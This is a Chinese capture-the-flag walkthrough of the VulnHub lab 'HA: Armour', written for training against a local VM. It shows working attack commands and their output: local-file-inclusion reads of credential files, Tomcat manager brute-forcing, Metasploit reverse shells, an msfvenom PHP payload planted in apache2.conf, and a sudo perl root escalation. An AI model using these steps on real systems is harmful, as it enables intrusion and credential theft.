下载地址:点我

bilibili:点我

信息收集

  • nmap扫存活找到IP为:192.168.116.140
➜  ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
Nmap scan report for 192.168.116.1
Host is up (0.00031s latency).
Nmap scan report for 192.168.116.140
Host is up (0.00074s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
➜ ~ nmap -A -T4 192.168.116.140 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
Nmap scan report for 192.168.116.140
Host is up (0.0018s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Armour
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.24
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
65534/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
| 256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
|_ 256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
➜ ~
  • 开放80,8009,8080端口,都是Web服务分别是Apache httpd,Apache Jserv和Apache Tomcat,还有一个65534端口为ssh服务。
  • 指定端口连接ssh,得到第一个flag:HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA},和提示:TheOlympics
➜  ~ ssh 192.168.116.140 -p65534
The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts. db 88888888ba 88b d88 ,ad8888ba, 88 88 88888888ba
d88b 88 "8b 888b d888 d8"' `"8b 88 88 88 "8b
d8'`8b 88 ,8P 88`8b d8'88 d8' `8b 88 88 88 ,8P
d8' `8b 88aaaaaa8P' 88 `8b d8' 88 88 88 88 88 88aaaaaa8P'
d8YaaaaY8b 88""""88' 88 `8b d8' 88 88 88 88 88 88""""88'
d8""""""""8b 88 `8b 88 `8b d8' 88 Y8, ,8P 88 88 88 `8b
d8' `8b 88 `8b 88 `888' 88 Y8a. .a8P Y8a. .a8P 88 `8b
d8' `8b 88 `8b 88 `8' 88 `"Y8888Y"' `"Y8888Y"' 88 `8b www.hackingarticles.in HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA} Hint 1: TheOlympics kali-team@192.168.116.140's password:
  • 浏览器访问80端口,F12发现注释里有armour,notes.txt,还有69,开始不知道什么意思。但是对TCP/UDP端口列表熟悉的话,可以猜出来是TFTP(小型文件传输协议)的端口,详细TCP/UDP端口列表
  • 可以使用nmap加UDP协议判断69端口是否开放。
➜  ~ sudo  nmap -sU -p69 192.168.116.140
[sudo] kali-team 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
Nmap scan report for 192.168.116.140
Host is up (0.00073s latency). PORT STATE SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:E7:98:9F (VMware) Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
  • 因为要发送UDP报文,所以要加sudo以Root权限执行。发现目标有开放69端口。
  • TFTP客户端连上服务端下载notes.txt文件,得到第二个flag。
➜  ~ atftp
tftp> connect 192.168.116.140
tftp> get notes.txt
tftp> quit
➜ ~ cat notes.txt
Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC} Hint 2: maybeevena
➜ ~
  • 还有一个提示maybeevena,不知道什么鬼。先爆破80端口的php后缀文件。
➜  ~ dirb http://192.168.116.140 -X .php

-----------------
DIRB v2.22
By The Dark Raver
----------------- START_TIME: Wed Oct 9 22:23:10 2019
URL_BASE: http://192.168.116.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1] ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.116.140/ ----
+ http://192.168.116.140/file.php (CODE:200|SIZE:0) -----------------
END_TIME: Wed Oct 9 22:23:13 2019
DOWNLOADED: 4612 - FOUND: 1
➜ ~
  • 找到file.php,打开页面一片空白,fuzz参数。
➜  ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
******************************************************** Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
Total requests: 77 ===================================================================
ID Response Lines Word Chars Payload
=================================================================== 000000033: 200 28 L 36 W 1437 Ch "file" Total time: 0.130840
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 588.5036 ➜ ~
  • 找到参数为file,还是一个文件读取漏洞,因为是Apache的服务,所以先想到读取Apache相关的文件,敏感的文件有.htpasswd,一般在/etc/apache2/.htpasswd
➜  ~ curl http://192.168.116.140/file.php\?file\=/etc/apache2/.htpasswd
Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C} Hint 3: StarBucks
➜ ~
  • 找到第三个flag,和第三个提示:StarBucks。
  • 官方提示:

P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

  • 三个提示拼起来就是:TheOlympics maybeevena starBucks,强行当密码。

tomcat 获取会话

  • 浏览器打开8080端口,发现是一个Tomcat的管理页面,密码已经知道,现在来爆破用户名。
➜  CeWL git:(master) ✗ ./cewl.rb -v  http://192.168.116.140 -d 10 -w dict.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://192.168.116.140
Visiting: http://192.168.116.140, got response code 200
Attribute text found: Offsite link, not following: https://hackingarticles.in
Writing words to file
➜ CeWL git:(master) ✗ cat dict.txt
Armour
PAGE
CONTENT
Header
ARMOUR
Collection
Armours
MCU
Photo
Grid
armour
End
Page
Content
Footer
Powered
Hacking
Articles
notes
txt
➜ CeWL git:(master) ✗ pwd
/home/kali-team/Kali-Team_Tools/CeWL
➜ CeWL git:(master) ✗
  • 使用CeWL爬80端口的网页生成用户名的字典,使用MSF对Tomcat进行登录密码枚举。
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options 

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                 Required  Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD TheOlympicsmaybeevenaStarBucks no The HTTP password to specify for authentication
PASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/kali-team/Kali-Team_Tools/CeWL/dict.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host msf5 auxiliary(scanner/http/tomcat_mgr_login) >
  • 不知道为什么,我重启服务器后才枚举出来,用户名是:armour。
  • [+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
  • Tomcat上传木马有很多方法,可以手工上传WAR文件部署。
  • 这里就使用MSF比较省时间。
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword
set httppassword
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
httppassword => TheOlympicsmaybeevenaStarBucks
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
httpusername => armour
msf5 exploit(multi/http/tomcat_mgr_upload) > run [*] Started reverse TCP handler on 192.168.116.1:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying wJ0oIWvcGX...
[*] Executing wJ0oIWvcGX...
[*] Undeploying wJ0oIWvcGX ...
[*] Sending stage (53867 bytes) to 192.168.116.140
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800 meterpreter >
  • 枚举本地开发端口
meterpreter > shell
Process 61 created.
Channel 75 created.
netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:65534 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 572/java
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::65534 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 572/java
tcp6 0 0 :::8009 :::* LISTEN 572/java
tcp6 0 0 192.168.116.140:50706 192.168.116.1:4444 ESTABLISHED 685/java
  • 这里发现目标主机上监听着8081端口,只能在目标本地进行访问,所以我们可以把端口转发出来,MSF里有自带的。
meterpreter > portfwd /?
Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
[*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
meterpreter >
  • 现在访问自己的8081端口就可以拿到第四个flag。
➜  ~ curl http://127.0.0.1:8081
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
  • 或者直接在目标主机访问
tomcat@ubuntu:~$ cd /tmp
cd /tmp
tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
wget http://127.0.0.1:8081
--2019-10-10 04:46:42-- http://127.0.0.1:8081/
Connecting to 127.0.0.1:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56 [text/html]
Saving to: ‘index.html’ index.html 100%[===================>] 56 --.-KB/s in 0s 2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56] tomcat@ubuntu:/tmp$ cat index.html
cat index.html
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
tomcat@ubuntu:/tmp$

权限提升

  • 查找GUID文件
tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/bsd-write
/usr/bin/mlocate
tomcat@ubuntu:/$
  • 查找SUID文件
tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
tomcat@ubuntu:/$
tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
find / -perm -4000 2>dev/null | xargs ls -la
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 04:05 /bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 17 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
tomcat@ubuntu:/$
  • 查找可写目录,发现有/var/www/html
tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/tftpboot
/var/lib/php/sessions
/var/www/html
/var/tmp
/proc/902/task/902/fd
/proc/902/fd
/proc/902/map_files
/tmp
  • 查找root用户权限可写文件
tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
<ev/null | grep -v "/proc/" |xargs ls -al |grep root
-rwxrwxrwx 1 root root 7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root tomcat 2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root root 0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
tomcat@ubuntu:/$
  • 找到/etc/apache2/apache2.conf/opt/tomcat/conf/tomcat-users.xml文件可写。
  • /opt/tomcat/conf/tomcat-users.xml只有之前的账号密码,只能看/etc/apache2/apache2.conf文件了。
  • 查找passwd文件,每行记录又被冒号(:)分隔为7个字段分别对应:用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell
  • group文件对应:组名:口令:组标识号:组内用户列表
tomcat@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
tomcat@ubuntu:/$ tomcat@ubuntu:~$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,armour
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:armour
floppy:x:25:
tape:x:26:
sudo:x:27:armour
audio:x:29:
dip:x:30:armour
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:armour
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
mlocate:x:108:
uuidd:x:109:
ssh:x:110:
armour:x:1000:
lpadmin:x:111:armour
sambashare:x:112:armour
ssl-cert:x:113:
tomcat:x:1001:
aarti:x:1002:
tomcat@ubuntu:~$
  • 找到一个普通用户aarti和armour
  • 把Apache配置文件下载到自己的电脑,Apache默认以www-data用户启动的
http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
  • 修改用户和组,让Apache以上面那个普通用户启动,为什么不能以Root用户启动能?因为不重新编译是不能用Root权限的,这样Web服务也起不来。所以只能改aarti的
  • 覆盖Apache配置文件
tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
<p://192.168.116.1:8000/apache2.conf -O apache2.conf
--2019-10-10 04:52:49-- http://192.168.116.1:8000/apache2.conf
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7195 (7.0K) [text/plain]
Saving to: ‘apache2.conf’ apache2.conf 100%[===================>] 7.03K --.-KB/s in 0s utime(apache2.conf): Operation not permitted
2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195] tomcat@ubuntu:/etc/apache2$ cat apache2.conf
  • 写入后到80端口服务下的目录写木马。(这是官方出题人写的),我试了不对,创建文件的用户为Tomcat,aarti用户读不了这个文件,所以是访问不了的,服务端报500错误。
  • 后来我利用文件包含Apache的配置文件获取到了会话。
  • 就是把Shell写进Apache2.conf,再利用上面发现的文件包含漏洞。
➜  ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
➜ ~ cat shell.php >> apache2.conf msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.116.1:2333
[*] Sending stage (38288 bytes) to 192.168.116.140
[*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800 meterpreter > getuid
Server username: aarti (1002)
meterpreter > shell
Process 12388 created.
Channel 0 created.
python3.6 -c 'import pty;pty.spawn("/bin/bash")'
aarti@ubuntu:/var/www/html$ whoami
whoami
aarti
aarti@ubuntu:/var/www/html$

提Root权限

  • 列举无密码sudo,发现有一个perl
aarti@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for aarti on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User aarti may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/perl
aarti@ubuntu:/var/www/html$
aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/bash";'
root@ubuntu:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/var/www/html#
root@ubuntu:~# ls
ls
final.txt
root@ubuntu:~# cat final.txt
cat final.txt ______ ______ _____ _ _ ______
/\ (_____ \ | ___ \ / ___ \ | | | |(_____ \
/ \ _____) )| | _ | || | | || | | | _____) )
/ /\ \ (_____ ( | || || || | | || | | |(_____ (
| |__| | | || || || || |___| || |___| | | |
|______| |_||_||_||_| \_____/ \______| |_| IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF} !! Congrats you have finished this task !! Contact us here: Hacking Articles : https://twitter.com/rajchandel/ AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/ +-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
root@ubuntu:~#

HA: Armour-Write-up的更多相关文章

  1. VulnHub靶场学习_HA: ARMOUR

    HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...

  2. VulnHub靶场学习_HA: Natraj

    HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...

  3. HA 高可用软件系统保养指南

    又过了一年 618,六月是公司一年一度的大促月,一般提前一个月各系统就会减少需求和功能的开发,转而更多去关注系统可用性.稳定性和管控性等方面的非功能需求.大促前的准备工作一般叫作「备战」,可以把线上运 ...

  4. MySQL: Fabric 搭建 HA

    搭建好Fabric之后,就可以在它的基础上创建HA Group. Shard Group.HA+Shard Group等.这里来说明一下如何快速的搭建HA环境. Fabric 192.168.2.23 ...

  5. zookeeper集群的搭建以及hadoop ha的相关配置

    1.环境 centos7 hadoop2.6.5 zookeeper3.4.9 jdk1.8 master作为active主机,data1作为standby备用机,三台机器均作为数据节点,yarn资源 ...

  6. 使用Nginx+Lua代理Hadoop HA

    一.Hadoop HA的Web页面访问 Hadoop开启HA后,会同时存在两个Master组件提供服务,其中正在使用的组件称为Active,另一个作为备份称为Standby,例如HDFS的NameNo ...

  7. hadoop2.7.1 HA安装部署(转)

    hadoop集群规划 目标:创建2个NameNode,做高可用,一个NameNode挂掉,另一个能够启动:一个运行Yarn,3台DataNode,3台Zookeeper集群,做高可用. 在 hadoo ...

  8. 【转】 XenServer架构之HA概述

    一.XenServer HA概述 XenServer HA是一套全自动功能设计,规划,安全地恢复出现问题的XenServe 主机上的虚拟机的功能组件. 启用 HA 后,XenServer 将持续监视池 ...

  9. ActiveMQ笔记(3):基于Networks of Brokers的HA方案

    上一篇介绍了基于ZK的ActiveMQ HA方案,虽然理解起来比较容易,但是有二个不足: 1)  占用的节点数过多,1个zk集群至少3个节点,1个activemq集群也至少得3个节点,但其实正常运行时 ...

随机推荐

  1. Multisim 如何调整编辑界面大小

    1.option -> sheet properties 2.选择workspace

  2. Codeforces Round #599 (Div. 2) B1. Character Swap (Easy Version)

    This problem is different from the hard version. In this version Ujan makes exactly one exchange. Yo ...

  3. 概率dp light1038

    题意:问一个数一步步除以他的除数,最后转移到1,所需要的期望步数. 思路,概率dp问题,从结果逆推,本题是从1开始往后推,怎么个推法呢.参考一下别人的博客: 求操作次数的期望时,先设定第i个因子给期望 ...

  4. 汪莹:以RELX悦刻为例,复盘中国品牌出海的跨文化挑战

    海外销售额每月2倍增速,3个月拿下东南亚市场第一,出口43个国家,拥有250万用户--你可能不知道,这是一家成立仅一年半.出海仅7个月的中国企业交出的答卷. 这家企业就是中国第一大电子烟品牌RELX悦 ...

  5. P2P头部平台退出后,普通人如何避开投资理财的“雷区”?

    编辑 | 于斌 出品 | 于见(mpyujian) 近期,P2P市场上不断传来不利消息,引起市场轩然大波,也打乱了投资者投资计划,是继续坚持自己的选择还是另择它路? 18日,陆金所作为千亿头部平台,宣 ...

  6. P & R 11

    要做好floorplan需要掌握哪些知识跟技能? 首先熟悉data flow对摆floorplan 有好处,对于减少chip的congestion 是有帮助的,但是也不是必需的,尤其是EDA工具快速发 ...

  7. html 打印相关操作与实现

    2020-02-19 | chrome 79.0.3945.130 测试无问题 未做兼容测试 原理为调用 window.print() 方法,但是该方法只能对当前页面全部打印,所以有了以下方案来解决局 ...

  8. Ubuntu16.04+Ros+Usb_Cam ORB SLAM2

    转载自:https://www.jianshu.com/p/dbf39b9e4617亲测可用 1.其中编译ORB_SLAM2的   ./build.sh 和 ./build_ros.sh之前需要修改文 ...

  9. 谁说程序员没有时间关心女朋友的,Python 教你如何掌握女神情绪变化

    很多人都是在朋友圈装死,微博上蹦迪.微信朋友圈已经不是一个可以随意发表心情的地方了,微博才是! 所以你不要傻傻盯着女神的朋友圈发呆啦!本文教你如何用 Python 自动通知女神微博情绪变化,从今天开始 ...

  10. iOS性能优化之内存(memory)优化

    https://www.jianshu.com/p/8662b2efbb23 近期在工作中,对APP进行了内存占用优化,减少了不少内存占用,在此将经验进行总结和分享,也欢迎大家进行交流. 在优化的过程 ...